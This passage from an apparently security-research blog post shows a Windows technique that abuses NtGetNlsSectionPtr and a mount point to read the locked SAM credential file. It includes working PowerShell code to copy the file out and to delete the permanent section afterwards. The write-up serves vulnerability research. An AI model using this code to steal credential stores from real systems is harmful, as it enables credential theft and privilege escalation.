So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.
$dir = "\SystemRoot\system32\c_1337.nls"
New-Directory $dir

$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir `
             -Options OpenReparsePoint,DirectoryFile) {
  # Turn the new directory into a mount point targeting the SAM file.
  $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =
     [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
  Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
    # Copy the mapped section contents to the output file.
    $map.GetStream().CopyTo($output)
    Write-Host "Copied file"
  }
}
Loading the created file in a hex editor shows we did indeed steal the SAM file.

For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point, otherwise you’ll try and open the SAM again). As for the section, the object was created in our security context (just like the directory) and there was no explicit security descriptor, so we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                    -Access Delete) {
  # Delete permanent object.
  $sect.MakeTemporary()
}
Wrap-Up
What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7, so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GitHub at this link if you want the final version to get a better understanding of how it works.
It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful, as it did for me in this case. Many times I’ve found code which isn’t itself a vulnerability but has some useful properties which allow you to build out exploitation chains.